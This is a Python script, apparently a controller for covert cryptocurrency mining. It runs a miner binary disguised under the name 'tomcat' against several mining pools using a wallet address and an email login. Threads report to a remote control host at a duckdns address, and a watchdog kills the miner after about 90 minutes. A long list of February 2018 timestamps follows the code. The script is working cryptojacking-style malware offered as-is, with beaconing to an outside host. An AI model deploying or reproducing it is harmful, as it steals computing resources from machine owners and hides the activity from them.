import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:52:04.818765
#2018-02-17 17:39:01.395679
#2018-02-17 19:27:01.855034
#2018-02-17 21:16:04.249402
#2018-02-17 22:59:01.909939
#2018-02-18 00:46:01.698120
#2018-02-18 02:35:04.057690
#2018-02-18 04:22:05.013405
#2018-02-18 06:12:06.179499
#2018-02-18 08:02:04.277162
#2018-02-18 09:50:04.343905
#2018-02-18 11:37:03.862980
#2018-02-18 13:22:04.668436
#2018-02-18 15:12:07.328940
#2018-02-18 17:01:01.474652
#2018-02-18 18:47:04.820717
#2018-02-18 20:34:01.806282
#2018-02-18 22:19:07.067841
#2018-02-19 00:09:02.057623
#2018-02-19 01:55:05.503493
#2018-02-19 03:42:06.364959
#2018-02-19 05:27:07.582852
#2018-02-19 07:15:01.974962
#2018-02-19 09:03:08.049208
#2018-02-19 10:52:02.008570
#2018-02-19 12:42:07.881775
#2018-02-19 14:31:10.551902
#2018-02-19 16:19:07.372019
#2018-02-19 18:07:08.127765
#2018-02-19 19:54:07.406649
#2018-02-19 21:41:01.408486
#2018-02-19 23:28:02.075563
#2018-02-20 01:14:04.747408
#2018-02-20 03:04:01.518872
#2018-02-20 04:52:01.508729
#2018-02-20 06:35:07.196610
#2018-02-20 08:20:09.902354
#2018-02-20 10:06:05.978698
#2018-02-20 11:50:01.485167
#2018-02-20 13:37:06.998551
#2018-02-20 15:20:04.399928
#2018-02-20 17:06:11.494964
#2018-02-20 18:54:07.692705
#2018-02-20 20:44:07.788817
#2018-02-20 22:29:05.496847
#2018-02-21 00:10:03.004409
#2018-02-21 01:57:06.299186
#2018-02-21 03:45:08.897724
#2018-02-21 05:34:03.617153
#2018-02-21 07:22:05.847288
#2018-02-21 09:07:05.906506
#2018-02-21 10:55:04.815790
#2018-02-21 12:41:06.443792
#2018-02-21 14:29:07.012315
#2018-02-21 16:17:02.155325
#2018-02-21 18:06:08.246289
#2018-02-21 19:54:04.980333
#2018-02-21 21:42:05.563309
#2018-02-21 23:29:05.043541
#2018-02-22 01:17:04.285267
#2018-02-22 03:08:04.233988
#2018-02-22 04:53:05.369373
#2018-02-22 06:38:07.570563
#2018-02-22 08:27:03.927529
#2018-02-22 10:14:04.110777
#2018-02-22 11:59:01.464540
#2018-02-22 13:44:05.255066
#2018-02-22 15:33:01.578886
#2018-02-22 17:18:08.116117
#2018-02-22 19:05:10.863758
#2018-02-22 20:56:06.209263
#2018-02-22 22:43:04.844153
#2018-02-23 00:29:01.961412
#2018-02-23 02:16:01.477866
#2018-02-23 04:05:03.756723
#2018-02-23 05:50:08.240495
#2018-02-23 07:41:05.487885
#2018-02-23 09:46:08.158729
#2018-02-23 11:47:08.643353
#2018-02-23 13:37:05.868172
#2018-02-23 15:24:07.799385
#2018-02-23 17:14:04.082069
#2018-02-23 18:58:05.737970
#2018-02-23 20:46:06.306496
#2018-02-23 22:31:08.351118
#2018-02-24 00:17:05.845436
#2018-02-24 02:08:02.195449
#2018-02-24 03:58:02.088420
#2018-02-24 05:44:01.279492
#2018-02-24 07:36:07.534659
#2018-02-24 09:21:05.840038
#2018-02-24 11:14:05.974086
#2018-02-24 13:03:06.284162
#2018-02-24 14:51:06.089752
#2018-02-24 16:43:03.509618
#2018-02-24 18:31:01.673029
#2018-02-24 20:17:01.262059
#2018-02-24 22:09:05.715447
#2018-02-25 01:06:07.000658
#2018-02-25 04:46:01.934922
#2018-02-25 08:59:02.015353